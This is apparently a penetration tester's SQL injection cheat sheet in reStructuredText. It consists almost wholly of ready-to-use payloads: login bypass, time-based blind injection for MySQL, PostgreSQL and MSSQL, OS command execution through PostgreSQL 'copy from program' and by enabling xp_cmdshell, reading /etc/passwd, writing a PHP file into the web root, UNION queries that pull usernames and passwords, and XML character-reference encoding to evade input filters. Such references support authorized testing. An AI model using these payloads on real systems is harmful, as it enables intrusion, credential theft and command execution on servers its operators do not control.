####
SQLi
####

| https://portswigger.net/web-security/sql-injection/cheat-sheet
| https://book.hacktricks.xyz/pentesting-web/sql-injection

******
Basics
******

.. code-block:: text

    1 OR 1=1-- -
    1' OR 1=1-- -
    admin'-- -

|

**********
Time Based
**********

.. code-block:: text

    # MySQL
    1' AND (select SLEEP(5))-- -

    # PostgreSQL
    1';SELECT PG_SLEEP(5)-- -
    1' AND 1=(select 1 from PG_SLEEP(5))-- -
    1';CREATE TABLE hack(a text);copy hack from program 'sleep 10';DROP TABLE IF EXISTS hack;-- -

    # MSSQL
    1' WAITFOR DELAY '0:0:10'-- -
    1';WAITFOR DELAY '0:0:10'-- -
    1'; EXEC sp_configure 'show advanced options', 1 ; EXEC sp_configure 'xp_cmdshell', 1 ; RECONFIGURE ; EXEC xp_cmdshell 'ping 192.0.2.1 -n 1 -w 10000' -- -
    1'; EXEC sp_configure 'show advanced options', 1 ; EXEC sp_configure 'xp_cmdshell', 1 ; RECONFIGURE ; EXEC xp_cmdshell 'powershell -c "Start-Sleep -Seconds 10"' -- -

|

**********
Read/Write
**********

.. code-block:: text

    # MySQL
    select load_file('/etc/passwd');
    select '' into OUTFILE '/var/www/html/test.php'

|

*****
Union
*****

.. code-block:: text

    1' Union Select 'aaa','bbb','ccc','ddd','eee' -- -
    ' UNION SELECT NULL--
    ' UNION SELECT NULL,NULL--
    ' UNION SELECT 'abc',NULL,NULL--
    ' UNION SELECT username, password FROM users--
    ' UNION SELECT NULL,username||'~'||password FROM users--

    # MySQL
    Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables

|

************
XML Encoding
************

| Characters can be written as XML character references, in decimal (``&#115;``) or hexadecimal (``&#x73;``) form.
| The XML parser decodes these references before the value reaches the query, so input validation has to run on the decoded value.

.. code-block:: bash

    # Hex
    echo -n 's' | xxd -plain | sed 's/\(..\)/\&#x\1;/g'
    echo -n 's' | python3 -c 'import sys;[print(f"&#x{ord(char):x};",end="") for char in sys.stdin.read()]'
    # Dec
    echo -n 's' | python3 -c 'import sys;[print(f"&#{ord(char)};",end="") for char in sys.stdin.read()]'
    # Example: s == &#x73; == &#115;

|

| Payload example

.. code-block:: text

    1 union select NULL